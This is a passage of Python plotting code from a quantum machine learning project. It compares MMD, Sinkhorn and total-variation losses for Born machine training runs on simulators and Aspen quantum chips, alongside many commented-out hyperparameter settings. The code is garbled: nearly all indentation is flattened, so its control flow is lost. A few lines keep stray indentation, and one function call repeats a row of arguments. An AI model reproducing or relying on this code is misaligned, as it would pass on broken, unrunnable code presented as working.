x1, x2, y1, y2 = 180, 200, 0.03, 0.09 # specify the limits
axins.set_xlim(x1, x2) # apply the x-limits
axins.set_ylim(y1, y2) # apply the y-limits
plt.xticks(visible=False)
mark_inset(ax, axins, loc1=3, loc2=1, fc="none", ec="0.5")
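            # The inset axes (axins) created above zoom in on roughly the final 20 epochs so the
            # converged losses can be compared; note that for the 2-qubit case only plot_colour is
            # set and no inset is defined.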
for trial in range(N_trials):
#Compute Average losses and errors, over a certain number of runs
average_loss, upper_error, lower_error = AverageCostsFromFile(N_epochs[trial], learning_rate[trial], data_type[trial], data_circuit[trial],
N_born_samples[trial], N_data_samples[trial], N_kernel_samples[trial],
batch_size[trial], kernel_type[trial], cost_func[trial], qc[trial], score[trial],
stein_eigvecs[trial], stein_eta[trial], sinkhorn_eps[trial])
tv_error = np.vstack((lower_error['TV'], upper_error['TV'])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
mmd_train_error = np.vstack((lower_error[('MMD', 'Train')], upper_error[('MMD', 'Train')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
mmd_test_error = np.vstack((lower_error[('MMD', 'Test')], upper_error[('MMD', 'Test')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
if qc[trial].lower()[0] == '2':
plot_markers = ['s', '+', 'o', 's', '+', 'o']
elif qc[trial].lower()[0] == '3':
plot_markers = ['s', '+', 'o', 's', '+', 'o']
elif qc[trial].lower()[0] == '4':
plot_markers = ['s', '+', 'o', 's', '+', 'o']
elif qc[trial].lower()[0] == '5':
plot_markers = ['s', '+', 'o', 's', '+', 'o']
if comparison.lower() == 'tv':
if kernel_type[trial][0].lower() == 'q':
# ax.plot(overview_data_x, overview_data_y)
ax.plot(x, average_loss['TV'], 'r%s-' %plot_markers[trial], \
label =r'$\mathsf{MMD}$ for $\kappa_{%s}$, $\eta_{init}$ = %.3f.' %(kernel_type[trial][0], learning_rate[trial]) )
ax.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor='r')
axins.plot(x, average_loss['TV'], 'r%s-' %plot_markers[trial], \
label =r'$\mathsf{MMD}$ for $\kappa_{%s}$, $\eta_{init}$ = %.3f.' %(kernel_type[trial][0], learning_rate[trial]) )
axins.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor='r')
elif kernel_type[trial][0].lower() == 'g':
ax.plot(x, average_loss['TV'], 'b%s-' %plot_markers[trial], \
label =r'$\mathsf{MMD}$ for $\kappa_{%s}$, $\eta_{init}$ = %.3f.' %(kernel_type[trial][0], learning_rate[trial]) )
ax.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor='c')
axins.plot(x, average_loss['TV'], 'b%s-' %plot_markers[trial], \
label =r'$\mathsf{MMD}$ for $\kappa_{%s}$, $\eta_{init}$ = %.3f.' %(kernel_type[trial][0], learning_rate[trial]) )
axins.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor='c')
ax.legend(loc='best', prop={'size': 20})
elif comparison.lower() == 'mmd':
if kernel_type[trial][0].lower() == 'q':
ax.plot(x, average_loss['MMD', 'Train'], 'r%s-' %plot_markers[trial], \
label =r'$\mathsf{MMD}$ for $\kappa_Q$, $\eta_{init}$ = %.3f.'%learning_rate[trial])
ax.fill_between(x, average_loss['MMD', 'Train'] - lower_error['MMD', 'Train'],\
average_loss['MMD', 'Train'] + upper_error['MMD', 'Train'], alpha=0.3, facecolor='r')
# plt.plot(x, average_loss['MMD', 'Test'], 'r-', label =r'MMD for $\kappa_Q$, $\eta_{init}$ = %.3f.'%learning_rate[trial])
ax.plot(x, average_loss['MMD', 'Test'], 'r-')
ax.fill_between(x, average_loss['MMD', 'Test'] - lower_error['MMD', 'Test'],\
average_loss['MMD', 'Test'] + upper_error['MMD', 'Test'], alpha=0.1, facecolor='r')
axins.plot(x, average_loss['MMD', 'Train'], 'r%s-' %plot_markers[trial], \
label =r'$\mathsf{MMD}$ for $\kappa_Q$, $\eta_{init}$ = %.3f.'%learning_rate[trial])
axins.fill_between(x, average_loss['MMD', 'Train'] - lower_error['MMD', 'Train'],\
average_loss['MMD', 'Train'] + upper_error['MMD', 'Train'], alpha=0.3, facecolor='r')
# plt.plot(x, average_loss['MMD', 'Test'], 'r-', label =r'MMD for $\kappa_Q$, $\eta_{init}$ = %.3f.'%learning_rate[trial])
axins.plot(x, average_loss['MMD', 'Test'], 'r-')
axins.fill_between(x, average_loss['MMD', 'Test'] - lower_error['MMD', 'Test'],\
average_loss['MMD', 'Test'] + upper_error['MMD', 'Test'], alpha=0.1, facecolor='r')
elif kernel_type[trial][0].lower() == 'g':
ax.plot(x, average_loss['MMD', 'Train'], 'b%s-' %plot_markers[trial], \
label =r'$\mathsf{MMD}$ for $\kappa_G$, $\eta_{init}$ = %.3f.'%learning_rate[trial])
ax.fill_between(x, average_loss['MMD', 'Train'] - lower_error['MMD', 'Train'],\
average_loss['MMD', 'Train'] + upper_error['MMD', 'Train'], alpha=0.3, facecolor='b')
# plt.plot(x, average_loss['MMD', 'Test'], 'b-', label =r'$\mathsf{MMD}$ for $\kappa_G$, $\eta_{init}$ = %.3f.'%learning_rate[trial])
ax.plot(x, average_loss['MMD', 'Test'], 'b-')
ax.fill_between(x, average_loss['MMD', 'Test'] - lower_error['MMD', 'Test'],\
average_loss['MMD', 'Test'] + upper_error['MMD', 'Test'], alpha=0.1, facecolor='b')
axins.plot(x, average_loss['MMD', 'Train'], 'b%s-' %plot_markers[trial], \
label =r'$\mathsf{MMD}$ for $\kappa_G$, $\eta_{init}$ = %.3f.'%learning_rate[trial])
axins.fill_between(x, average_loss['MMD', 'Train'] - lower_error['MMD', 'Train'],\
average_loss['MMD', 'Train'] + upper_error['MMD', 'Train'], alpha=0.3, facecolor='b')
# plt.plot(x, average_loss['MMD', 'Test'], 'b-', label =r'$\mathsf{MMD}$ for $\kappa_G$, $\eta_{init}$ = %.3f.'%learning_rate[trial])
axins.plot(x, average_loss['MMD', 'Test'], 'b-')
axins.fill_between(x, average_loss['MMD', 'Test'] - lower_error['MMD', 'Test'],\
average_loss['MMD', 'Test'] + upper_error['MMD', 'Test'], alpha=0.1, facecolor='b')
ax.legend(loc='best', prop={'size': 20})
plt.show()
return
[N_epochs, learning_rate, data_type, data_circuit, N_born_samples, N_data_samples, N_kernel_samples, batch_size, kernel_type, \
cost_func, qc, score, stein_eigvecs, stein_eta, sinkhorn_eps, runs] = [[] for _ in range(16)]
'''
Three QUBITS
'''
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Quantum')
# cost_func.append('MMD')
# qc.append('3q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.05)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Quantum')
# cost_func.append('MMD')
# qc.append('3q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.075)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Quantum')
# cost_func.append('MMD')
# qc.append('3q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.05)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('3q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.05)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('3q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.075)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('3q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.05)
# runs.append(0)
'''
FOUR QUBITS
'''
# N_epochs.append(200)
# learning_rate.append(0.005)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Quantum')
# cost_func.append('MMD')
# qc.append('4q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.007)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Quantum')
# cost_func.append('MMD')
# qc.append('4q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Quantum')
# cost_func.append('MMD')
# qc.append('4q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.005)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('4q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.007)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('4q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('4q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# CompareKernelsPlot(N_epochs, learning_rate, data_type, data_circuit,
# N_born_samples, N_data_samples, N_kernel_samples,
# batch_size, kernel_type, cost_func, qc, score,
# stein_eigvecs, stein_eta, sinkhorn_eps, 'tv', runs, legend = True)
# ###################################################################################################################
# #Automatic Compilation
# ###################################################################################################################
def PlotAutomaticCompilation(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type1, cost_func, qc, score,
stein_eigvecs1, stein_eta, sinkhorn_eps, runs, comparison, legend = True):
    '''This function reads output information from a file, relating to automatic compilation of circuits, and plots it'''
loss, born_final_probs, data_probs_final = ReadFromFile(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type1, cost_func, qc, score,
stein_eigvecs1, stein_eta, sinkhorn_eps, runs)
try:
average_loss, upper_error, lower_error = AverageCostsFromFile(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
                                                                N_born_samples, N_data_samples, N_kernel_samples,
                                                                batch_size, kernel_type1, cost_func, qc, score,
                                                                stein_eigvecs1, stein_eta, sinkhorn_eps)
cost_error = np.vstack((lower_error['TV'], upper_error['TV'])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
except:
print('Average files not found')
pass
x = np.arange(0, N_epochs-1, 1)
if comparison.lower() == 'tv':
if cost_func.lower() == 'sinkhorn':
plot_colour = 'b'
# plt.errorbar(x, average_loss['TV'], cost_error, None,\
# '%s' %(plot_colour), label =r'Sinkhorn with Hamming cost'+ '\n'\
# + r'$\eta_{init}$ = %.3f, $\epsilon$ = %.3f.' %( learning_rate, sinkhorn_eps),\
# capsize=1, elinewidth=1, markeredgewidth=2)
x_sink = np.arange(0, len(average_loss['TV']))
plt.plot(x_sink, average_loss['TV'],label ='Sinkhorn using Hamming cost,'+'\n'+ r'$\eta_{init}$ = %.3f, $\epsilon$ = %.3f.' % (learning_rate, sinkhorn_eps) )
plt.fill_between(x_sink, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.3)
plt.legend(loc='best', prop={'size': 20})
plt.show()
elif comparison.lower() == 'cost':
try:
if cost_func.lower() == 'sinkhorn':
train_error = np.vstack((lower_error[('Sinkhorn', 'Train')], upper_error[('Sinkhorn', 'Train')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
test_error = np.vstack((lower_error[('Sinkhorn', 'Test')], upper_error[('Sinkhorn', 'Test')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
except:
pass
if cost_func.lower() == 'sinkhorn':
plot_colour = 'b'
x_sink = np.arange(0, len(average_loss['Sinkhorn', 'Train']))
plt.plot(x_sink, average_loss['Sinkhorn', 'Train'],'%so-' % plot_colour,\
label =r'Sinkhorn on training set using Hamming cost, $\eta_{init}$ = %.3f.' % learning_rate )
plt.fill_between(x_sink, average_loss['Sinkhorn', 'Train'] - lower_error['Sinkhorn', 'Train'],\
average_loss['Sinkhorn', 'Train'] + upper_error['Sinkhorn', 'Train'], alpha=0.3, facecolor='b')
plt.plot(x_sink, average_loss['Sinkhorn', 'Test'],'%s-' % plot_colour,\
label =r'Sinkhorn on test set using Hamming cost, $\eta_{init}$ = %.3f.' % learning_rate )
plt.fill_between(x_sink, average_loss['Sinkhorn', 'Test'] - lower_error['Sinkhorn', 'Test'],\
average_loss['Sinkhorn', 'Test'] + upper_error['Sinkhorn', 'Test'], alpha=0.3)
# plt.errorbar(x_sink, average_loss[('Sinkhorn', 'Train')], train_error, None,\
# '%so-' %(plot_colour), label =r'Sinkhorn on training set',\
# capsize=1, elinewidth=1, markeredgewidth=2)
# plt.errorbar(x_sink, average_loss[('Sinkhorn', 'Test')], test_error, None,\
# '%s-' %(plot_colour), label =r'Sinkhorn on test set',\
# capsize=1, elinewidth=1, markeredgewidth=2)
plt.legend(loc='best', prop={'size': 20})
plt.show()
elif comparison.lower() == 'probs':
fig, axs = plt.subplots()
axs.clear()
x = np.arange(len(data_probs_final))
axs.bar(x, data_probs_final.values(), width=0.2, color= 'k' , align='center')
axs.bar(x-(0.2*(0+1)), born_final_probs.values(), width=0.2, color='b', align='center')
axs.legend((r'$\mathsf{IQP}$ Data',r'$\mathsf{QAOA}$ $\mathsf{IBM}$ with Sinkhorn.'), fontsize = 20)
axs.set_xticks(range(len(data_probs_final)))
axs.set_xticklabels(list(data_probs_final.keys()),rotation=70)
plt.show()
return
'''TWO QUBITS'''
# N_epochs = 200
# learning_rate = 0.002
# data_type = 'Quantum_Data'
# data_circuit = 'IQP'
# N_born_samples = 500
# N_data_samples = 500
# N_kernel_samples = 2000
# batch_size = 250
# kernel_type ='Gaussian'
# cost_func = 'Sinkhorn'
# qc = '2q-qvm'
# score = 'Approx'
# stein_eigvecs = 3
# stein_eta = 0.01
# sinkhorn_eps = 0.1
# runs = 0
'''THREE QUBITS'''
# N_epochs = 200
# learning_rate = 0.005
# data_type = 'Quantum_Data'
# data_circuit = 'IQP'
# N_born_samples = 500
# N_data_samples = 500
# N_kernel_samples = 2000
# batch_size = 250
# kernel_type ='Gaussian'
# cost_func = 'Sinkhorn'
# qc = '3q-qvm'
# score = 'Approx'
# stein_eigvecs = 3
# stein_eta = 0.01
# sinkhorn_eps = 0.1
# runs = 0
# PlotAutomaticCompilation(N_epochs, learning_rate, data_type, data_circuit,
# N_born_samples, N_data_samples, N_kernel_samples,
# batch_size, kernel_type, cost_func, qc, score,
# stein_eigvecs, stein_eta, sinkhorn_eps, runs, 'probs', legend = True)
def CompareCostFunctionsonQPU(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score,
stein_eigvecs, stein_eta, sinkhorn_eps, runs, comparison, legend = True):
loss, born_final_probs, data_probs_final = ReadFromFile(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score,
stein_eigvecs, stein_eta, sinkhorn_eps, runs)
N_trials = len(N_epochs)
if comparison.lower() == 'probs':
plot_colour = ['g*-', 'y*-', 'bo-', 'co-']
fig, axs = plt.subplots()
data_plot_colour = 'k'
bar_plot_colour = ['g','y', 'b', 'c']
patterns = [ "o" , ""]
axs.clear()
#Plot Data
x = np.arange(len(data_probs_final[0]))
axs.bar(x, data_probs_final[0].values(), width=0.1, color= '%s' %data_plot_colour, align='center')
#Plot MMD One
axs.bar(x-(0.2*(0+1)), born_final_probs[1].values(), width=0.1, color='%s' %(bar_plot_colour[0]), align='center')
axs.bar(x-(0.2*(0+0.5)), born_final_probs[0].values(), width=0.1, color='%s' %(bar_plot_colour[1]), align='center')
#Plot Sinkhorn
axs.bar(x-(0.2*(0+2)), born_final_probs[3].values(), width=0.1, color='%s' %(bar_plot_colour[2]), align='center')
axs.bar(x-(0.2*(0+1.5)), born_final_probs[2].values(), width=0.1, color='%s' %(bar_plot_colour[3]), align='center')
# axs.set_xlabel("Outcomes", fontsize=20)
# axs.set_ylabel("Probability", fontsize=20)
axs.legend(('Data',r'\textsf{MMD}, on %s' %qc[0], r'\textsf{MMD}, on %s' %qc[1], r'Sinkhorn, on %s' %qc[2], r'Sinkhorn, on %s' %qc[3] ), fontsize = 20)
axs.set_xticks(range(len(data_probs_final[0])))
axs.set_xticklabels(list(data_probs_final[0].keys()),rotation=70)
plt.show()
elif comparison.lower() == 'tv':
plot_colour = ['g*-', 'y*-', 'bo-', 'co-']
fig, ax = plt.subplots()
for trial in range(N_trials):
average_loss, upper_error, lower_error = AverageCostsFromFile(N_epochs[trial], learning_rate[trial], data_type[trial], data_circuit[trial],
N_born_samples[trial], N_data_samples[trial], N_kernel_samples[trial],
batch_size[trial], kernel_type[trial], cost_func[trial], qc[trial], score[trial],
stein_eigvecs[trial], stein_eta[trial], sinkhorn_eps[trial])
cost_error = np.vstack((lower_error['TV'], upper_error['TV'])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
x = np.arange(0, N_epochs[trial]-1, 1)
if cost_func[trial].lower() == 'mmd':
ax.plot(x, average_loss['TV'], '%s' %(plot_colour[trial]), label =r'\textsf{MMD}, on %s.' % qc[trial] )
ax.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor='%s' %plot_colour[trial][0])
# axins.plot(x, average_loss['TV'], 'r%s-' %plot_markers[trial], \
# label =r'MMD for $\kappa_{%s}$, $\eta_{init}$ = %.3f.' %(kernel_type[trial][0], learning_rate[trial]) )
elif cost_func[trial].lower() == 'sinkhorn':
x_sink = np.arange(0, len(average_loss['TV']))
ax.plot(x_sink, average_loss['TV'], '%s' %(plot_colour[trial]), label =r'Sinkhorn, on %s.' %qc[trial])
                ax.fill_between(x_sink, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor='%s' %plot_colour[trial][0])
plt.legend(loc='best', prop={'size': 20})
plt.show()
elif comparison.lower() == 'cost':
for trial in range(N_trials):
try:
average_loss, upper_error, lower_error = AverageCostsFromFile(N_epochs[trial], learning_rate[trial], data_type[trial], data_circuit[trial],
N_born_samples[trial], N_data_samples[trial], N_kernel_samples[trial],
batch_size[trial], kernel_type[trial], cost_func[trial], qc[trial], score[trial],
stein_eigvecs[trial], stein_eta[trial], sinkhorn_eps[trial])
if cost_func[trial].lower() == 'mmd':
train_error = np.vstack((lower_error[('MMD', 'Train')], upper_error[('MMD', 'Train')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
test_error = np.vstack((lower_error[('MMD', 'Test')], upper_error[('MMD', 'Test')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
elif cost_func[trial].lower() == 'stein':
train_error = np.vstack((lower_error[('Stein', 'Train')], upper_error[('Stein', 'Train')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
test_error = np.vstack((lower_error[('Stein', 'Test')], upper_error[('Stein', 'Test')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
elif cost_func[trial].lower() == 'sinkhorn':
train_error = np.vstack((lower_error[('Sinkhorn', 'Train')], upper_error[('Sinkhorn', 'Train')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
test_error = np.vstack((lower_error[('Sinkhorn', 'Test')], upper_error[('Sinkhorn', 'Test')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
except:
pass
if cost_func[trial].lower() == 'mmd':
if qc[trial].lower()[8] == '3':
plot_colour = ['g', 'y']
elif qc[trial].lower()[8] == '4':
plot_colour = ['g', 'y']
x_mmd = np.arange(0, len(average_loss['MMD', 'Train']))
plt.plot(x_mmd, average_loss['MMD', 'Train'],'%s*-' % plot_colour[trial],\
label =r'\textsf{MMD} on training set for %s' %qc[trial] )
plt.fill_between(x_mmd, average_loss['MMD', 'Train'] - lower_error['MMD', 'Train'],\
average_loss['MMD', 'Train'] + upper_error['MMD', 'Train'], alpha=0.5, facecolor='%s' %plot_colour[trial])
plt.plot(x_mmd, average_loss['MMD', 'Test'],'%s-' % plot_colour[trial],\
label =r'\textsf{MMD} on test set for %s' %qc[trial] )
plt.fill_between(x_mmd, average_loss['MMD', 'Test'] - lower_error['MMD', 'Test'],\
average_loss['MMD', 'Test'] + upper_error['MMD', 'Test'], alpha=0.3, facecolor='%s' %plot_colour[trial])
# x_mmd = np.arange(0, len(average_loss['MMD', 'Train']))
# plt.errorbar(x_mmd, average_loss[('MMD', 'Train')], train_error, None,\
# '%sx-' %(plot_colour[trial]), label =r'MMD on %s.' \
# %qc[trial], capsize=1, elinewidth=1, markeredgewidth=2)
# plt.errorbar(x_mmd, average_loss[('MMD', 'Test')], test_error, None,\
# '%s-' %(plot_colour[trial]), label =r'MMD on %s.' \
# %(qc[trial]),capsize=1, elinewidth=1, markeredgewidth=2)
# r'MMD Loss $\mathcal{L}_{\mathsf{MMD}}$', fontsize = 20)
elif cost_func[trial].lower() == 'sinkhorn':
                if qc[trial].lower()[8] == '3':
                    plot_colour = ['g', 'y', 'b', 'c']
                elif qc[trial].lower()[8] == '4':
                    plot_colour = ['g', 'y', 'b', 'c']
# plt.errorbar(x_sink, average_loss[('Sinkhorn', 'Train')], train_error, None,\
# '%sx-' %(plot_colour[trial]), label =r'Sinkhorn, on %s.' \
# %(qc[trial]),\
# capsize=1, elinewidth=1, markeredgewidth=2)
# plt.errorbar(x_sink, average_loss[('Sinkhorn', 'Test')], test_error, None,\
# '%s-' %(plot_colour[trial]), label =r'Sinkhorn, on %s.' \
# %(qc[trial]),\
# capsize=1, elinewidth=1, markeredgewidth=2)
x_sink = np.arange(0, len(average_loss['Sinkhorn', 'Train']))
plt.plot(x_sink, average_loss['Sinkhorn', 'Train'],'%so-' % plot_colour[trial],\
label =r'Sinkhorn on training set for %s' %qc[trial] )
plt.fill_between(x_sink, average_loss['Sinkhorn', 'Train'] - lower_error['Sinkhorn', 'Train'],\
average_loss['Sinkhorn', 'Train'] + upper_error['Sinkhorn', 'Train'], alpha=0.5, facecolor='%s'%plot_colour[trial])
plt.plot(x_sink, average_loss['Sinkhorn', 'Test'],'%s-' % plot_colour[trial],\
label =r'Sinkhorn on test set for %s' %qc[trial] )
plt.fill_between(x_sink, average_loss['Sinkhorn', 'Test'] - lower_error['Sinkhorn', 'Test'],\
average_loss['Sinkhorn', 'Test'] + upper_error['Sinkhorn', 'Test'], alpha=0.3, facecolor='%s'%plot_colour[trial])
plt.legend(loc='best', prop={'size': 20})
plt.show()
return
[N_epochs, learning_rate, data_type, data_circuit, N_born_samples, N_data_samples, N_kernel_samples, batch_size, kernel_type, \
cost_func, qc, score, stein_eigvecs, stein_eta, sinkhorn_eps, runs] = [[] for _ in range(16)]
'''#################################'''
'''ON CHIP ASPEN-4-3Q-A'''
'''#################################'''
# N_epochs.append(100)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('Aspen-4-3Q-A')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(100)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('Aspen-4-3Q-A-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(100)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Sinkhorn')
# qc.append('Aspen-4-3Q-A')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.2)
# runs.append(0)
# N_epochs.append(100)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Sinkhorn')
# qc.append('Aspen-4-3Q-A-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.3)
# runs.append(0)
# CompareCostFunctionsonQPU(N_epochs, learning_rate, data_type, data_circuit,
# N_born_samples, N_data_samples, N_kernel_samples,
# batch_size, kernel_type, cost_func, qc, score,
# stein_eigvecs, stein_eta, sinkhorn_eps, runs, 'cost', legend =True)
'''#################################'''
'''ON CHIP ASPEN-4-4Q-A'''
'''#################################'''
# N_epochs.append(100)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('Aspen-4-4Q-A')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(100)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('Aspen-4-4Q-A-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(100)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Sinkhorn')
# qc.append('Aspen-4-4Q-A')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(100)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Sinkhorn')
# qc.append('Aspen-4-4Q-A-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# CompareCostFunctionsonQPU(N_epochs, learning_rate, data_type, data_circuit,
